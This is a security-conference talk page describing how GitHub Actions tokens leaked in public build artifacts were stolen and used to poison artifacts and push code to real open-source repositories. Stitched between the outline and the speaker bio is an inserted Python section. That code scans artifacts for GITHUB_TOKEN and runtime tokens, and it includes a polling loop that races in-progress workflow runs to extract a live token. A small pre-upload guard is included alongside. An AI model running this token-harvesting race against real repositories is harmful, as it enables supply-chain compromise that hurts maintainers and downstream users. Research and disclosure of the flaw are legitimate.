Security Bsides Las Vegas 2024

Raiders of the Lost Artifacts: Racing for Hidden Treasures in Public GitHub Repositories
2024-08-06, Florentine F

Open-source projects often leverage GitHub Actions for automated builds. This talk delves into a novel attack vector where I discovered a treasure trove of secrets – leaked access tokens – hidden within seemingly innocuous build artifacts, available for everyone to consume. These tokens encompassed various cloud services, interesting in their own right, but I aimed to achieve more: taking control over these open-source projects.
Finding hidden GitHub Actions tokens in these artifacts was the easy part, and I even managed to poison the projects’ artifacts and cache, but pushing malicious code into the repositories failed, as the ephemeral tokens created in each workflow run expired as soon as the job was finished. This presented a thrilling challenge: a race against time to steal and use these tokens before they vanish.
This session equips attackers with a novel attack path, revealing how to unearth sensitive data in build artifacts, craft a high-speed exploit to catch ephemeral tokens, and utilize them for swift attacks. In this talk, I’ll showcase real-world examples of popular open-source projects I got to breach, as well as projects maintained by high-profile organizations.


  1. Introduction - 3 Mins
    a. GitHub Actions in a nutshell.
    b. GitHub Actions build artifacts allow data to persist after a job has completed and to be shared with other jobs in the same workflow.
    These artifacts can include items like test results, build outputs, binaries and log files.
  2. Some open-source projects upload build artifacts, which are always publicly accessible. It’s a completely overlooked area, and these artifacts tend to contain secrets used during CI pipeline execution. We can scan the artifacts for these leaked secrets. - 1 Min
  3. Showcase various secrets found in open-source projects for various cloud services, such as Last.fm and DigitalOcean. While secrets are always interesting on their own, it wasn’t enough - I wanted to take complete control over these open-source projects. - 1 Min
  4. Two common secrets found in these publicly available artifacts are ACTIONS_RUNTIME_TOKEN and GITHUB_TOKEN. Starting with the former: - 3 Mins
    a. Short intro on ACTIONS_RUNTIME_TOKEN: a short-lived authentication token used by GitHub Actions workflows for interacting with the GitHub Actions Cache and Artifacts mechanisms.
    b. How I managed to poison workflow artifacts of open-source projects using this token. These poisoned artifacts are executed by other pipeline jobs in the repository, and on developers’ machines. The poisoned cache is used by other jobs, and future executions of the current pipeline.
    c. Show a recording of how I poisoned an artifact uploaded by a pipeline of a popular open-source project (SchemaCrawler) with a malicious version of my own.
  5. Moving on to the main course, dealing with the GITHUB_TOKEN challenges. A short intro on GITHUB_TOKEN: a special, ephemeral access token automatically created for each pipeline job, which expires when the job finishes. GITHUB_TOKEN has permissions against the repository, like pushing code or uploading packages. - 1 Min
  6. Cover two main patterns I’ve observed in the wild where GitHub access tokens end up in artifacts. 3 Mins
    a. GitHub users unknowingly upload their .git folder as part of a public artifact.
    The .git folder contains a GITHUB_TOKEN (stored in .git/config), since the popular actions/checkout action persists credentials on disk by default.
    b. Super-linter is a popular linter maintained both independently and by GitHub, but by default it prints all environment variables to its log. Unaware maintainers often upload super-linter logs as public artifacts.
  7. The challenge: Every good piece of research needs some degree of luck. Why did my research come to a halt, and how was it fast-tracked by the GitHub gods? When scanning the artifacts, I found lots of GITHUB_TOKENs. The thing is, these tokens expire immediately when the workflow job completes. In parallel, the GitHub action responsible for uploading artifacts (upload-artifacts@v3) completes the upload only when the entire workflow is done, after all jobs end. This created an impossible mission for me, since I could only get my hands on a token after it had already been invalidated. That got me stuck. - 1 Min
  8. The plot changes: During my research, GitHub announced the newest version of the action: upload-artifacts@v4. The update provided a much faster upload, which made lots of projects upgrade their version in use. But the important change relevant for my research was that from this version, artifacts are made available for download as soon as they are uploaded without having to wait for the job to end.
  9. The race: pwning a GitHub repo before the GITHUB_TOKEN expires. This is the main part of the talk, where I show the full attack path. - 3 Mins
    a. Scanned thousands of public GitHub repositories that use GitHub Actions and upload artifacts, downloaded these artifacts, and scanned them for secrets.
    b. When a GITHUB_TOKEN is found: Stalk the project and wait for a workflow run to start.
    c. Once the workflow starts, constantly poll for an artifact upload. When one is available, download it, extract the GITHUB_TOKEN, and use it to push malicious code to the repository, all before the job ends. (In the vulnerable open-source projects I found, I simply created a new branch for demonstration, which also requires write permission in the token.)
    d. Building a fully automated hacking setup, using... GitHub Actions: Explain why I chose GitHub Actions as the offensive infrastructure to do the dirty work: it reduced latency (bringing me closer to the attack destination), it’s triggerable via API, and it already provides the capabilities I needed, implemented as GitHub Actions.
  10. Show a recorded demo of an attack against the highly popular quay/clair repository (>10k stars), maintained by Red Hat. - 2 Mins
  11. I don’t like to lose. How I managed to win more and more races: Cover the preconditions I had to meet to win the race, and how I overcame them by further enhancing the exploit infrastructure. For example, the optimization process included sending a multitude of requests per second while removing HTTP headers and SSL verification.
  12. Review disclosed open-source projects: Google, AWS, Red Hat, OWASP, and more. - 1 Min
  13. Release a new GitHub action that wraps the native upload-artifacts GitHub action while safeguarding against accidental secret leaks. It performs pre-upload checks to identify secrets and block the upload of artifacts that contain them.
  14. Summary - 1 Min
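The two steps of the outline that are purely mechanical, scanning a downloaded artifact for the leak patterns in item 6 (a checkout credential persisted in .git/config, and an environment dump in a super-linter log) and then racing to pull a GITHUB_TOKEN out of an in-progress run's artifacts before the job ends (item 9), are shown below as an added example. This is not the speaker's tooling or the action released in item 13; it is editor-written illustration code. It assumes that a job's GITHUB_TOKEN is a `ghs_` token of 36 characters after the prefix, that ACTIONS_RUNTIME_TOKEN is a JWT, that actions/checkout persists its credential as an `http.https://github.com/.extraheader` value of `AUTHORIZATION: basic base64("x-access-token:<token>")`, and that the caller supplies the two GitHub API calls (list an in-progress run's artifacts, download an archive) as callables, so the race loop itself can run offline against a constructed artifact. The same scanner doubles as the pre-upload check of item 13.

```python
"""Scan GitHub Actions artifacts for leaked tokens and race an in-progress run.

Added example, not the talk's code. Assumptions: GITHUB_TOKEN is 'ghs_' + 36 chars,
ACTIONS_RUNTIME_TOKEN is a JWT, and actions/checkout persists its credential in
.git/config as 'extraheader = AUTHORIZATION: basic <b64("x-access-token:<token>")>'.
"""
import base64
import io
import re
import time
import zipfile
from typing import Callable, Iterable, Optional

GHS_TOKEN = re.compile(r"\bghs_[A-Za-z0-9]{36}\b")
JWT = re.compile(r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\b")
BASIC_HEADER = re.compile(r"AUTHORIZATION:\s*basic\s+([A-Za-z0-9+/=]+)", re.I)


def scan_text(path: str, text: str) -> list[dict]:
    """Return findings for one artifact member as {'path', 'kind', 'token'} dicts."""
    findings = []
    # Pattern 6a: credential persisted by actions/checkout, base64 inside a git extraheader.
    for b64 in BASIC_HEADER.findall(text):
        try:
            user_pass = base64.b64decode(b64).decode()
        except Exception:
            continue
        if user_pass.startswith("x-access-token:"):
            findings.append({"path": path, "kind": "GITHUB_TOKEN (git extraheader)",
                             "token": user_pass.split(":", 1)[1]})
    # Pattern 6b: environment dumped into a log, e.g. GITHUB_TOKEN=ghs_... by super-linter.
    for tok in GHS_TOKEN.findall(text):
        if not any(f["token"] == tok for f in findings):
            findings.append({"path": path, "kind": "GITHUB_TOKEN", "token": tok})
    for tok in JWT.findall(text):
        findings.append({"path": path, "kind": "ACTIONS_RUNTIME_TOKEN (JWT)", "token": tok})
    return findings


def scan_entries(entries: Iterable[tuple[str, bytes]]) -> list[dict]:
    """Scan (path, bytes) pairs; binary members are decoded leniently."""
    out = []
    for path, data in entries:
        out.extend(scan_text(path, data.decode("utf-8", errors="ignore")))
    return out


def scan_artifact_zip(data: bytes) -> list[dict]:
    """Artifacts download as zip archives; scan every file member."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return scan_entries((n, zf.read(n)) for n in zf.namelist() if not n.endswith("/"))


def assert_safe_to_upload(entries: Iterable[tuple[str, bytes]]) -> None:
    """Pre-upload guard (item 13): refuse the upload if any secret is present."""
    found = scan_entries(entries)
    if found:
        raise ValueError("refusing to upload: " +
                         ", ".join(f"{f['kind']} in {f['path']}" for f in found))


def race_for_token(list_artifacts: Callable[[], list[str]],
                   download: Callable[[str], bytes],
                   deadline_s: float, interval_s: float = 0.5,
                   clock: Callable[[], float] = time.monotonic,
                   sleep: Callable[[float], None] = time.sleep) -> Optional[str]:
    """Poll an in-progress run's artifacts (item 9c) until a GITHUB_TOKEN shows up
    or the deadline passes (by which time the job, and the token, are gone).
    list_artifacts/download are injected: in practice they wrap
    GET /repos/{owner}/{repo}/actions/runs/{run_id}/artifacts and each entry's
    archive_download_url; here they can be fakes."""
    seen: set[str] = set()
    end = clock() + deadline_s
    while clock() < end:
        for url in list_artifacts():
            if url in seen:
                continue
            seen.add(url)
            for f in scan_artifact_zip(download(url)):
                if f["kind"].startswith("GITHUB_TOKEN"):
                    return f["token"]
        sleep(interval_s)
    return None


# Constructed sample data: placeholder values, not real credentials.
SAMPLE_TOKEN = "ghs_" + "A" * 36
SAMPLE_JWT = "eyJhbGciOiJIUzI1NiJ9." + "x" * 20 + "." + "y" * 20


def build_sample_artifact() -> bytes:
    """Constructed artifact zip containing both leak patterns from item 6."""
    cred = base64.b64encode(f"x-access-token:{SAMPLE_TOKEN}".encode()).decode()
    git_config = ("[remote \"origin\"]\n\turl = https://github.com/example/repo\n"
                  "[http \"https://github.com/\"]\n"
                  f"\textraheader = AUTHORIZATION: basic {cred}\n")
    linter_log = (f"GITHUB_TOKEN={SAMPLE_TOKEN}\nACTIONS_RUNTIME_TOKEN={SAMPLE_JWT}\n"
                  "RUNNER_OS=Linux\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("src/.git/config", git_config)
        zf.writestr("super-linter.log", linter_log)
        zf.writestr("build/app.txt", "nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_artifact_zip(build_sample_artifact()):
        print(f"{f['kind']:32} {f['path']}")
```

The race loop deliberately stops as soon as a GITHUB_TOKEN is extracted rather than finishing the scan, since every round trip spent before the follow-up API call (creating a branch, pushing a commit) is time the job may use to finish and invalidate the token. Deduplicating on artifact URL keeps repeated polls from re-downloading the same archive.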

Yaron Avital is a seasoned professional with a diverse background in the technology and cybersecurity fields. Yaron's career has spanned over 15 years in the private sector as a software engineer and team lead at global companies and startups.
Driven by a passion for cybersecurity, Yaron now focuses on security research, with expertise in application security, software supply chain security, web security research, and reverse engineering of third-party protocols.